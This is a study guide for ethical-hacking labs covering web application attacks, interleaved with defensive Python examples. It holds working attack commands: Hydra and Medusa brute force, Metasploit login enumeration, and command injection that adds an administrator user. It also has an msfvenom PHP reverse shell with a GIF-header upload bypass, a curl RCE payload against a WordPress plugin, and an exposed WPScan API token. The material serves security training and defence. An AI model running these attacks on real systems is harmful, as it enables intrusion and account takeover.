# 2. Perform Web applications Attacks

{% embed url="<https://www.youtube.com/playlist?list=PL-Fa25Pu8l6xWiqWwStfxxjgdRx0hQCi->" %}

## 1. Brute force using Burp

Set the Burp proxy in the browser, intercept the login request, right-click it and send it to Intruder.

Now clear the payload positions and mark the fields to attack:

* <mark style="color:blue;">**Sniper if you are only brute forcing the password.**</mark>
* <mark style="color:blue;">**Cluster bomb if brute forcing both username and password.**</mark>

Set the payload type and wordlists, then start the attack. A response whose length differs from the rest indicates the successful attempt.

**Other Bruteforcing tools**

{% embed url="<https://shehackske.medium.com/brute-force-password-cracking-with-medusa-b680b4f33d69>" %}
Medusa
{% endembed %}

```
medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F
```

### Hydra brute force cheatsheet

```
# SSH
hydra -l username -P passlist.txt 192.168.0.100 ssh

# FTP
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100

# If the service isn't running on the default port, use -s
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221

# TELNET
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet

# Login form: ^PASS^ is replaced by each password; the last field is the string shown on a failed login
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
```
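On the defending side, the same signal the attacker relies on (many login POSTs from one source, almost all with an identical response size) is what a detection should look for. The following is an added example, not code from the original page: it parses web-server access log lines in combined log format, flags any source IP that sends at least `threshold` POSTs to the login path inside a sliding window, and reports response sizes that differ from the common failure size, since those are the probable successful guesses. The log lines and the `/department/login.php` path are constructed to match the form targeted in the cheatsheet above.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def _line(ip, second, size, method="POST", path="/department/login.php"):
    """Build one constructed access-log line (same second-of-minute layout for every sample)."""
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" 200 {size} "-" "Mozilla/5.0"')


# Constructed sample log: one brute-forcing source, one ordinary user, one unrelated GET.
SAMPLE_LOG = "\n".join(
    [_line("192.168.0.50", s, 1532) for s in range(1, 11)]          # 10 failed guesses, same body size
    + [_line("192.168.0.50", 11, 2210)]                               # one different size: likely success
    + [_line("192.168.0.77", 5, 1532), _line("192.168.0.77", 40, 1532)]  # ordinary user, two tries
    + [_line("192.168.0.50", 12, 980, method="GET", path="/department/")]  # ignored, not a login POST
)


def detect_bruteforce(log_text, login_path="/department/login.php",
                      threshold=10, window=timedelta(seconds=60)):
    """Return {ip: {...}} for every source that sent >= threshold POSTs to login_path
    inside any window of the given length. outlier_sizes lists response sizes that differ
    from the most common one, the same heuristic Intruder users apply by eye."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        size = -1 if m["size"] == "-" else int(m["size"])
        per_ip[m["ip"]].append((ts, size))

    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        times = [t for t, _ in events]
        # Two-pointer sweep: largest number of attempts falling inside one window.
        best, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        sizes = Counter(s for _, s in events)
        common = sizes.most_common(1)[0][0]
        outliers = sorted(s for s in sizes if s != common)
        alerts[ip] = {"attempts": len(events), "max_in_window": best, "outlier_sizes": outliers}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} login POSTs, {info['max_in_window']} within 60s, "
              f"odd response sizes {info['outlier_sizes']}")
```

The threshold and window are the tuning knobs: a low threshold on a busy site produces noise from users who mistype, while a window much longer than the attacker's pace misses slow, throttled attempts.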

## <mark style="color:red;">2. Parameter tampering using Burp</mark>

In the Proxy tab, open the Inspector panel, where each parameter's name and value are shown. Change a value, forward the request and compare the response.

<figure><img src="/files/WveR9KCSrPbgr100zGe2" alt=""><figcaption></figcaption></figure>
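What makes parameter tampering work is a server that trusts a value the client was never supposed to control. This is an added example, not part of the original page: a constructed checkout handler in its vulnerable form (it multiplies the client-sent `price` by `quantity`) next to a hardened form that derives the price from a server-side catalogue, validates `quantity` as a bounded integer, and records any request that still carries a `price` field as a tampering signal. The catalogue, product ids and parameter names are assumptions.

```python
from decimal import Decimal

# Constructed server-side catalogue: hypothetical product ids and prices.
CATALOGUE = {"1001": Decimal("49.99"), "1002": Decimal("9.50")}

# Requests that tried to supply a price are worth logging: honest clients never send one.
TAMPER_LOG = []


def checkout_vulnerable(params):
    """Trusts every field the client sent, including the price and an unchecked quantity."""
    return Decimal(params["price"]) * int(params["quantity"])


def checkout_hardened(params):
    """Only the product id and quantity come from the client; everything priced is server-side."""
    product_id = params.get("product_id")
    if product_id not in CATALOGUE:
        raise ValueError("unknown product")
    try:
        qty = int(params.get("quantity", ""))
    except ValueError:
        raise ValueError("quantity must be an integer") from None
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    if "price" in params:
        # Never honour it, but keep the evidence for detection.
        TAMPER_LOG.append({"product_id": product_id, "client_price": params["price"]})
    return CATALOGUE[product_id] * qty


def hardened_outcome(params):
    """Return the total, or the rejection reason as a string."""
    try:
        return checkout_hardened(params)
    except ValueError as exc:
        return str(exc)


# Constructed tampered requests, as they might be edited in the Inspector panel.
TAMPERED = {"product_id": "1001", "quantity": "2", "price": "0.01"}
NEGATIVE = {"product_id": "1001", "quantity": "-3", "price": "49.99"}

if __name__ == "__main__":
    print("vulnerable total:", checkout_vulnerable(TAMPERED))   # 0.02
    print("hardened total:  ", hardened_outcome(TAMPERED))      # 99.98
    print("negative qty:    ", hardened_outcome(NEGATIVE))      # rejected
    print("tamper log:      ", TAMPER_LOG)
```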

## <mark style="color:red;">3. Identify XSS using PwnXss</mark>

{% embed url="<https://github.com/pwn0sec/PwnXSS>" %}

```
python3 pwnxss.py -u http://testphp.vulnweb.com
```

<figure><img src="/files/GrqQAJrGNEVoPAcebuCt" alt=""><figcaption></figcaption></figure>
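A scanner such as PwnXSS works by sending a probe in a parameter and checking whether it comes back in the response unchanged. The following added example (not code from the page or from the PwnXSS project) shows that check against a constructed page renderer: a vulnerable version that reflects the query verbatim, a hardened version that HTML-escapes it, and a third that places the value inside a URL inside an attribute, where it needs URL encoding before the HTML escaping. The probe string and the rendering functions are assumptions.

```python
import html
from urllib.parse import quote


def render_vulnerable(query):
    """Reflects the parameter straight into the page: what a scanner like PwnXSS is probing for."""
    return f"<p>Results for {query}</p>"


def render_hardened(query):
    """HTML-escape for element content; quote=True also escapes quotes for attribute context."""
    return f"<p>Results for {html.escape(query, quote=True)}</p>"


def render_link_hardened(query):
    """A value inside a URL inside an attribute: URL-encode first (every character, safe=''),
    then HTML-escape the result so the attribute cannot be broken out of."""
    encoded = html.escape(quote(query, safe=""), quote=True)
    return f'<a href="/search?q={encoded}">search again</a>'


# Constructed probe: the same kind of marker a scanner injects to test for reflection.
PROBE = "<script>alert(1)</script>"


def reflects_unescaped(render, probe=PROBE):
    """True when the raw probe survives into the response, i.e. the page reflects input unescaped."""
    return probe in render(probe)


if __name__ == "__main__":
    for name, fn in [("vulnerable", render_vulnerable), ("hardened", render_hardened),
                     ("link", render_link_hardened)]:
        print(f"{name:10s} reflects unescaped: {reflects_unescaped(fn)}")
```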

## <mark style="color:red;">4. Exploit parameter tampering with XSS</mark>

## <mark style="color:red;">5. Perform CSRF attacks</mark>

WPSCAN

```
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp
```

Add `--random-user-agent` if a firewall blocks the default WPScan user agent.

## <mark style="color:red;">6. Hack a WordPress site with WPScan and Metasploit</mark>

### Installation

```
sudo apt update && sudo apt install wpscan 
wpscan --update
```

Enumerate WordPress users

```
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u 
```

WPScan can enumerate users (`u`), plugins (`p`), themes (`t`) and only the vulnerable plugins (`vp`):

```
wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY
```

<figure><img src="/files/X8x4ZBJStDMBD8PmCOsD" alt=""><figcaption></figcaption></figure>

Now start the database and launch Metasploit

```
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
```

Now set the options to brute force it (TARGETURI is the base path of the WordPress install, not a full URL)

```
set PASS_FILE /usr/wordlist.txt
set RHOSTS 192.168.52.2
set RPORT 8080
set TARGETURI /
set USERNAME admin
run
```

<figure><img src="/files/baQc6DwtTSsoO03eQVd5" alt=""><figcaption></figcaption></figure>

### WPSCAN brute forcing

```
wpscan --url http://cmnatics.playground --passwords rockyou.txt --usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY
```

### Reference

{% embed url="<https://tryhackme.com/room/webenumerationv2>" %}

## <mark style="color:red;">7. Remote command execution to compromise a target server</mark>

**Setup and complete DVWA Guides**

{% embed url="<https://cavementech.com/2022/12/dvwa-walkthrough.html>" %}

{% embed url="<https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/>" %}

### Windows command injection

```
hostname
whoami
tasklist
:: forcefully kill a process by PID
taskkill /PID 3112 /F
dir c:\
net user
:: add a new user
net user test /add
:: add the test user to the Administrators group
net localgroup Administrators test /add
:: view the details of the user
net user test
:: locate pin.txt, or read it directly
dir c:\pin.txt
type c:\pin.txt
```
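The reason these commands run at all is that the DVWA ping page pastes user input into a shell command line, so a `|` or `&` in the input starts a second command. This added example (not from the page or from DVWA) shows a constructed ping handler in that vulnerable shape next to a hardened one that validates the value as an IP address with the standard `ipaddress` module and passes it as a single argv element without a shell, plus a cheap metacharacter check that a WAF or log review can use to spot injection attempts. The function names are assumptions.

```python
import ipaddress
import platform
import subprocess


def build_ping_vulnerable(target):
    """The DVWA-style bug: input is pasted into a command string meant for shell=True,
    so an input like '127.0.0.1 | type c:\\pin.txt' runs both halves."""
    return f"ping -c 1 {target}"


def build_ping_hardened(target):
    """Validate the value as an IP address and return argv for subprocess without a shell.
    Raises ValueError for anything that is not a bare IP address."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    return ["ping", count_flag, "1", str(addr)]


def accepts(target):
    """True when the hardened builder would accept this input."""
    try:
        build_ping_hardened(target)
        return True
    except ValueError:
        return False


def is_injection_attempt(target):
    """Detection heuristic: shell metacharacters that never appear in a legitimate address."""
    return any(ch in target for ch in "|&;`$<>\n")


def run_ping(target, timeout=5):
    """Execute the validated command; shell=False is subprocess.run's default."""
    proc = subprocess.run(build_ping_hardened(target), capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "127.0.0.1 | type c:\\pin.txt", "127.0.0.1 & net user"]:
        print(f"{candidate!r}: vulnerable string={build_ping_vulnerable(candidate)!r} "
              f"accepted={accepts(candidate)} injection={is_injection_attempt(candidate)}")
```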

## <mark style="color:red;">8. Exploit File upload vulnerability</mark>

Generating the payload

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php
```

Run multi/handler to catch the shell (LHOST and LPORT must match the values baked into the payload)

```
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run
```

Check the DVWA walkthroughs above. For the high security level, prepend the following GIF signature to the payload so it passes the image check, and save it with a .jpeg extension

```
GIF89a;
```

Now in the command prompt, copy the uploaded file under a .php name

```
copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php 
```

Browse to the copied shell.php and the handler will receive the Meterpreter session.
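The upload check this section bypasses looks only at the leading bytes, which is why a `GIF89a;` prefix is enough. This added example (not code from DVWA or the page) shows a constructed upload validator that closes both gaps used above: the declared extension must agree with the real file signature (a `.jpeg` that starts with a GIF header is rejected), any file carrying a PHP or script opening marker is rejected regardless of its header, and the file is stored under a server-generated random name in a directory of the server's choosing, so the client's filename never reaches the filesystem. The `MAGIC` table holds real image signatures; the upload directory and sample files are assumptions.

```python
import secrets
import tempfile
from pathlib import Path

# Allowed extensions and the real file signatures each must begin with.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Markers that never belong in an image but would matter if the file were ever interpreted.
CODE_MARKERS = (b"<?", b"<script", b"<%")


def validate_upload(filename, data, max_bytes=2_000_000):
    """Return (True, ext) when the upload is acceptable, otherwise (False, reason)."""
    ext = Path(filename).suffix.lower()
    if ext not in MAGIC:
        return False, f"extension {ext or '(none)'} not allowed"
    if len(data) > max_bytes:
        return False, "file too large"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match the claimed image type"
    lowered = data.lower()
    if any(marker in lowered for marker in CODE_MARKERS):
        return False, "embedded code marker found"
    return True, ext


def safe_name(ext):
    """Server-generated filename: random, with the validated extension only."""
    return secrets.token_hex(16) + ext


def store_upload(filename, data, upload_dir):
    """Validate, then write under a generated name inside upload_dir (assumed to be outside the web root)."""
    ok, info = validate_upload(filename, data)
    if not ok:
        raise ValueError(info)
    name = safe_name(info)
    (Path(upload_dir) / name).write_bytes(data)
    return name


# Constructed samples: a file with a valid PNG signature and a dummy body,
# and a GIF-prefixed file with a PHP opening tag, the trick described above.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
POLYGLOT = b"GIF89a;<?php /* php payload would go here */ ?>"

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print("stored as", store_upload("photo.png", GOOD_PNG, tmp))
    for name in ("shell.jpeg", "shell.gif", "shell.php"):
        print(name, "->", validate_upload(name, POLYGLOT))
```

The magic-byte check alone would still let `shell.gif` through, which is why the marker scan and, above all, the non-executable storage location and generated filename matter: even a file that passes every content check must never be reachable as `something.php` under the web root.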

## <mark style="color:red;">9. Exploit Log4j vulnerability</mark>

## 10. Perform Remote Code Execution (RCE) Attack

We will exploit RCE in a plugin in wordpress.

1. In the Terminal window, run the `wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token]` command.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/6.22.jpg)
2. The result appears, displaying detailed information regarding the target website.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/3.jpg)
3. Scroll down to the **Plugin(s) Identified** section, and observe the installed vulnerable plugins (**wp-upg**) on the target website.
4. In the **Plugin(s) Identified** section, within the context of the **wp-upg** plugin, an **Unauthenticated Remote Code Execution (RCE)** vulnerability has been detected as shown in the screenshot.

   > The number of vulnerable plugins might differ when you perform this lab.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/4.jpg)
5. In this task, we will exploit the **RCE** vulnerability present in the **wp-upg** plugin.
6. To perform the RCE attack, run the `curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL'` command.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/rce.jpg)
7. This curl command exploits a WordPress plugin vulnerability by sending a malicious request to the **admin-ajax.php** file, allowing an attacker to execute arbitrary system commands via the **exec** function, potentially leading to **remote code execution**.
8. In the last step, the **whoami** command was executed, yielding the outcome **nt authority\system**.
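From the defender's side, the request in step 6 has a recognisable shape: an `admin-ajax.php` call whose parameter value is a colon-separated list naming a command-execution function. The following added example (not code from the page or the lab) inspects request URLs, percent-decodes the query string so an encoded variant normalises to the same value, and reports any `admin-ajax.php` request whose parameter contains such a token. The first sample URL is the one from the lab text; the other three are constructed (an encoded copy, a benign WordPress heartbeat action, and a non-AJAX search).

```python
from urllib.parse import parse_qs, urlsplit

# Function names that have no business appearing as a field in an AJAX data-table request.
EXEC_TOKENS = {"exec", "system", "shell_exec", "passthru", "popen", "proc_open"}


def inspect_request(url):
    """Return a finding dict for a suspicious admin-ajax.php request, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs percent-decodes, so field%3Aexec%3A... is seen as field:exec:...
    qs = parse_qs(parts.query, keep_blank_values=True)
    action = qs.get("action", [""])[0]
    for name, values in qs.items():
        for value in values:
            hit = {token.lower() for token in value.split(":")} & EXEC_TOKENS
            if hit:
                return {"action": action, "param": name, "value": value, "tokens": sorted(hit)}
    return None


def scan(urls):
    """Run inspect_request over many URLs and keep only the findings."""
    return [finding for finding in (inspect_request(u) for u in urls) if finding]


SAMPLE_REQUESTS = [
    # From the lab text above.
    "http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL",
    # Constructed: the same request with the colons percent-encoded.
    "http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field%3Aexec%3Awhoami%3ANULL%3ANULL",
    # Constructed: a benign core action that admin-ajax.php serves constantly.
    "http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=heartbeat",
    # Constructed: not an admin-ajax request at all, even though it mentions exec.
    "http://10.10.1.22:8080/CEH/?s=exec",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f"action={finding['action']} param={finding['param']} "
              f"tokens={finding['tokens']} value={finding['value']!r}")
```

The same logic applies to access logs once the request line is extracted; the decisive design point is to match on the decoded parameter value rather than on the raw URL string, otherwise the encoded variant slips past.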

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}

